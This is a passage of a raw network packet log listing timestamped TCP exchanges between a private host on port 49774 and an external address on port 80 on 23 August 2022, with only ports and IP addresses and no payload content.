Aug 23, 2022 03:42:58.219958067 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.219980001 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.219985008 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.220038891 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.220177889 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.220218897 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.220236063 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.220258951 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.220289946 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.220318079 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.220335960 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.220356941 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.220396042 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.220408916 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.220436096 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.220448971 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.220467091 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.220516920 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.220796108 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.220834970 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.220859051 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.220875978 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.220900059 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.220905066 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.220932961 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.220957994 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.221990108 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.222059965 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.222062111 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.222090006 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.222110033 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.222137928 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.222143888 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.222166061 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.222167015 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.222194910 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.222202063 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.222213984 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.222215891 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.222242117 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.222249031 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.222266912 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.222270012 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.222280979 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.222300053 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.222318888 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.222326994 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.222347021 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.222347975 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.222373009 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.222382069 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.222394943 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.222402096 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.222423077 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.222424030 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.222450972 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.222451925 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.222465992 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.222490072 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.222907066 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.223145962 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.223243952 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.223244905 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.223324060 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.224268913 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.224301100 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.224328041 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.224337101 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.224349022 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.224354029 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.224375010 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.224376917 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.224390030 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.224404097 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.224431038 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.224431038 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.224451065 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.224452019 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.224478960 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.224507093 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.224517107 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.224529982 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.224531889 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.224553108 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.224559069 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.224592924 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.224617958 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.245230913 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.245286942 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.245398045 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.245795965 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.246432066 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.246521950 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.247390032 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.247435093 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.247466087 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.247524977 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.247556925 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.248383999 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.248426914 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.248459101 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.248466969 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.248497009 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.248500109 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.248512030 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.248572111 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.248868942 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.248933077 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.249042988 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.249084949 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.249111891 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.249150991 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.249195099 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.249267101 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.249309063 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.249349117 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.249377012 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.249382019 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.249418020 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.249439001 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.250232935 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.250318050 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.250339031 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.250361919 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.250384092 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.250391006 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.250427961 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.250459909 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.250467062 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.250493050 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.250505924 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.250526905 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.250535011 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.250566959 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.250575066 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.250577927 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.250612974 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.250653028 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.250680923 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.250680923 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.250713110 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.250720024 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.250739098 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.250758886 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.250787973 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.250798941 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.250828028 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.250843048 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.250869989 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.250875950 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.250906944 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.250914097 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.250922918 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.250946999 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.250966072 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.250974894 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.251002073 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.251013041 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.251066923 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.251231909 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.251306057 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.251665115 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.251692057 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.251732111 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.251760960 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.251797915 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.251810074 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.251841068 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.251869917 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.251909018 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.252003908 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.252101898 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.252221107 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.252255917 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.252281904 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.252310991 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.252315044 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.252352953 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.252372026 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.252372026 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.252444983 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.252515078 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.252540112 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.252608061 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.252616882 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.252676964 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.252732038 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.252810955 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.252835989 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.252878904 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.252926111 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.253001928 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.253036976 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.253073931 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.253099918 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.253106117 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.253129959 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.253134966 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.253156900 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.253168106 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.253202915 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.253204107 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.253216028 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.253226995 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.253261089 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.253281116 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.253295898 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.253318071 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.253329039 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.253345966 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.253377914 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.253387928 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.253411055 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.253412008 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.253446102 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.253453970 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.253460884 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.253468990 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.253499031 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.253504038 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.253511906 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.253537893 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.253557920 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.253573895 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.253599882 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.253633022 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.253638029 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.253659964 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.253670931 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.253700018 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.253704071 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.253727913 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.253747940 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.253761053 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.253776073 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.253849030 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.253915071 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.253950119 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.254051924 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.254077911 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.254112005 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.254131079 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.254146099 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.254165888 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.254179955 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.254188061 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.254204035 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.254267931 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.254323006 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.254443884 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.254492044 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.254517078 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.254522085 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.254556894 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.254585028 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.254676104 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.254816055 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.254851103 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.254874945 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.254889965 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.254909039 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.254910946 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.254944086 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.254945993 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.254956961 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.254978895 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.255004883 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.255008936 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.255042076 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.255053043 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.255287886 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.255325079 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.255398035 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.255446911 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.255481958 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.255517960 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.255548954 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.255573988 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.255574942 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.255601883 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.255671024 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.255680084 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.255714893 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.255750895 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.255774021 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.255785942 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.255820990 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.255852938 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.277622938 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.277664900 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.277811050 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.277853012 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.277885914 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.277925014 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.277944088 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.277956963 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.278131008 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.278170109 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.278198004 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.278204918 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.278238058 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.278239012 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.278256893 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.278278112 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.278321028 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.278325081 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.278335094 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.278353930 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.278423071 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.278430939 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.278461933 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.278501987 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.278526068 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.278531075 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.278561115 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.278569937 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.278580904 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.278609037 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.278673887 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.278676987 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.278707981 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.278784037 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.279412031 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.279495001 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.279532909 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.279576063 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.279603004 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.279670954 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.280385971 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.280520916 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.280564070 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:58.280591965 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:58.280627012 CEST	49774	80	192.168.2.3	45.95.11.158
